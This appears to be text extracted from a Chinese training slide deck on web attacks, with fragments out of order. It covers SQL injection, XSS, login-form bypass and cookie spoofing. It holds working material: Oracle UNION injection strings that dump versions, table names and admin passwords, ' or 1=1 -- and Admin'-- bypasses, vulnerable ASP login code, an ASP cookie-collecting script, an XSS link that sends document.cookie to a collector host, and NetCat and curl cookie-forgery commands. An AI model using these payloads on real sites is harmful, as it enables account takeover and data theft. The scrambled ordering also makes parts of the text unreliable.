web应用攻击技术

存在SQL注入之表单绕过的URL
http://192.168.148.128/0990dbapp/userinfo/user_checklogin.asp?username=adm in%27-&userpassword=1111&imageField=%B5%C7+%C2%BD
只要在登陆页面/userinfo/login.asp中。将用户名输
就风险而言，SQL
安全 风险
Injection攻击也是位居前列，和缓冲区溢 出漏洞相比，其优势在于能够轻易的绕过防火墙直接访问数据 库，甚至能够获得数据库所在的服务器的系统权限。 在Web应用漏洞中，SQL Injection 漏洞的风险要高过其他所 有的漏洞。
攻击特点
攻击的广泛性：由于其利用的
国外收集xss的站
利用跨站获取COOKIE
跨站漏洞演示
跨站攻击的危害
窃取
Cookie
ActiveX Flash 内容
劫持帐户 执行 执行
强迫您下载软件 对硬盘和数据采取操作 ……
XSS挂马
SNS和Web2.0网站的发展，让交互性更的更强。SQL注入减少，XSS 将慢慢抬头，利用方式也变多。
查询ORACLE数据库的版本
and%20%201=2%20union%20select%20null,null,(select%20 banner%20from%20sys.v_$version%20where%20rownum=1),' null',null,null,'null','null','null','null'%20from%2 0dual-查询当前连接用户 and%20%201=2%20union%20select%20null,null,(select%20 SYS_CONTEXT%20('USERENV',%20'CURRENT_USER')%20from%2 0dual),'null',null,null,'null','null','null','null'% 20from%20dual--—爆出当前连接用户为TOUR
Select * from user where id=123 String id =request.getParameter(“id”); String sql = "SELECT * FROM user WHERE id = " + id;
判断数据库类型
根据入侵经验该系统的后台可能为ORACLE数据库 Dual这个表是ORACLE数据库特有的,
• 获取HTTP响应头，增加cookies信息
– 将请求参数改成Cookie字段，进行SQL注入。
看下它是否存在，
如果存在就说明数据库为ORACLE。
提交：And
0<>(select count(*) from dual),返回正
常页面
字段猜解
猜解字段数量并构造查询语句
And%201=1%20union%20select%20null,null,null,null,null,null,nul l,null,null,null from dual—页面返回正常，查询语句语法正确
跨站脚本漏洞产生原理
由于WEB应用程序没有对用户的输入和输出进行严格的过滤和转换，
就导致在返回页面中可能嵌入恶意代码。
什么是跨站脚本攻击
XSS又叫CSS
(Cross Site Script) ，跨站脚本攻击。它指的是恶 意攻击者往WEB页面里插入恶意html代码，当用户浏览该页之时，嵌 入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目 的。 种攻击能在一定程度上隐藏身份。
SQL注入
就攻击技术本质而言，它利用的工具是SQL的语法，针对的是
技术 概述
应用程序开发者编程中的漏洞，当攻击者能操作数据，向应用 程序中插入一些SQL语句时，SQL Injection攻击就发生了。 实际上，SQL Injection攻击是存在于常见的多连接的应用程 序中的一种漏洞，攻击者通过在应用程序预先定义好的SQL语 句结尾加上额外的SQL语句元素，欺骗数据库服务器执行非授 权的任意查询,篡改和命令执行。
影响范围
数据库：MS-Sql
是SQL语法,使得攻击普遍存在； 攻击代码的多样性：由于各种 数据库软件及应用程序有其自 身的特点，实际的攻击代码可 能不尽相同；
Server、 Oracle、Mysql、DB2、 Informix等所有基于SQL语言 标准的数据库软件； 应用程序：ASP、PHP，JSP、 CGI、CFM等所有应用程序；
表单绕过漏洞
漏洞介绍
在登陆表单可以使用一些特殊字符绕过对合法用户的认证体系，
并且拥有合法用户的权限
漏洞成因
对用户输入的字符未做安全性检测，它属于特殊的SQL注入。
问题代码（ASP+ORACLE）
username=Request("username") userpassword=md5(replace(trim(request("userpassword")),"' ","")) set rs=server.CreateObject("adodb.recordset") sql="select * from userb where username='"&username&"' and userpassword='"&userpassword&"' " rs.Open sql ,conn,3,3
SQL注入攻击过程演示(1)
手动注入
发现注入点
发现产品展示的URL链接,提交单引号立即报错
用经典的and
1=1测试返回正常，用and 1=2返回不正常, 存
在注入漏洞 用 经 典 的 ’and ‘1’=‘1 测 试 返 回 正 常 ， 用 ’and ‘1’=‘2返回不正常, 存在注入漏洞
简单的SQL Injection攻击(1)
假设的登录查询
SELECT * FROM users
WHERE login = 'victor' AND password = '123‘
假设的ASP代码
var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'";
查询字段
and%20%201=2%20union%20select%20null,null,name,'nu ll',null,null,'null','null','null','null'%20from%2 0master--获取ADMIN中的用户名
and%20%201=2%20union%20select%20null,null,password ,‘null’,null,null,‘null’,‘null’,‘null’,‘n ull’%20from%20master-- 获取ADMIN中的管理密码，MD5加
跨站脚本执行漏洞的攻击效果需要借助第三方网站来显现，因此这 XSS属于被动式的攻击，因为其被动且不好利用，所以许多人常呼略
其危害性。
跨站脚本攻击传播途径
EMAIL IM 聊天室 留言板
论坛
交互性平台
编写Cookie收集脚本cookie.asp
<% dim strfilename strfilename = "fqytest.txt" '数据文件存放目录 set lP=server.createObject("Adodb.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312" lP.writetext request.Servervariables("QUERY_STRING") lP.SaveToFile server.mappath(strfilename),2 lP.Close set lP=nothing %> <script>windows.location('http://www.cnhacker.cn');</scri pt>
检测字段类型 and%201=1%20union%20select%20null,null,‘null’,’null’,null, null,‘null’,’null’,‘null’,’null’%20from%20dual—在第3 ,4,7,8,9,10位置加上 单引号均返回正常页面，字段是字符型
查询数据库中所有表名
and%20%201=2%20union%20select%20null,null,TABLE _NAME,'null',null,null,'null','null','null','nu ll'%20from%20USER_TABLES--成功获取表名
其中敏感表名包括A源自文库MIN ABOUT CONFIG MASTER
入:Admin’--;密码输入：任何字符
点击登陆，并提交，即可拥有管理员权限
存在SQL注入之表单绕过的URL
Cookie欺骗漏洞
漏洞介绍
利用工具修改客户端的Cookie欺骗服务器端的WEB程序
漏洞成因
WEB程序使用明文Cookie
WEB程序仅仅使用Cookie进行身份验证
文件型Cookie欺骗
简单的SQL Injection攻击(2)
输入字符
formusr = ' or 1=1 – – formpwd = anything
实际的查询代码
--是结束符，后面变成注释，导致 此SQL语句恒成立，可以登陆后台
SELECT * FROM users WHERE username = ' ' or 1=1 – – AND password = 'anything‘
会话型Cookie欺骗攻击
• 获取HTTP响应头，伪造Cookie
– 使用NetCat连接目标，获取HTTP响应头，修改Cookie字段
• 虚假代理，发送Cookie
– 使用NetCat监听端口，发送Cookie到浏览器，NC –vv –l –p 9090<Cookie.txt – 设置浏览器代理为127.0.0.1:9090，访问目标
由于是盲注点，所以选择用工具进行检测
Webscan加入当前http://192.168.148.128/09-
90dbapp/products.asp?id=1339进行自动检测
跨站脚本攻击
80%网站存在跨站漏洞, 包括许多大型知名网站 什么是跨站脚本攻击 跨站攻击的危害 跨站漏洞的检测与攻击手段
保存在硬盘上
会话型Cookie欺骗
保存在内存中
文件型Cookie欺骗攻击 • 修改硬盘上保存的Cookie
– 使用IECookieView修改
• 直接发送Cookie
– 直接使用curl发送Cookie – curl http://target/index.php -b "admin=1" -d "other_action=todo"
生成恶意URL诱骗用户点击
Cookie收集脚本运行在cookie.asp
http://target/index.asp?input=<script>document.locatio
n='http://control/cookie.asp?'+document.cookie</script >
目录 十大WEB应用安全漏 洞 SQL注入 XSS跨站 表单绕过 Cookies欺骗 信息泄露 GoogleHacking
访问控制错误 PHP特有漏洞攻击 变量滥用 文件包含 上传漏洞攻击 网页篡改、挂马 其他
十大常见的WEB应用攻击
SQL注入（SQL injection） 跨站脚本攻击 恶意代码 已知弱点和错误配置 隐藏字段 后门和调试漏洞 参数篡改 更改cookie 输入信息控制 缓冲区溢出
密
查找后台登陆地址 使用得到的密码成功登陆
SQL注入攻击过程演示(2) cookie注入
发现注入点
发现产品展示的详细信息的URL链接,在cookie里提交单引号
立即报错 在 cookie 里 用 %20AnD%208808%3D8808; 测 试 返 回 正 常 ， 用 %20AnD%208808%3D8807;返回不正常, 存在注入漏洞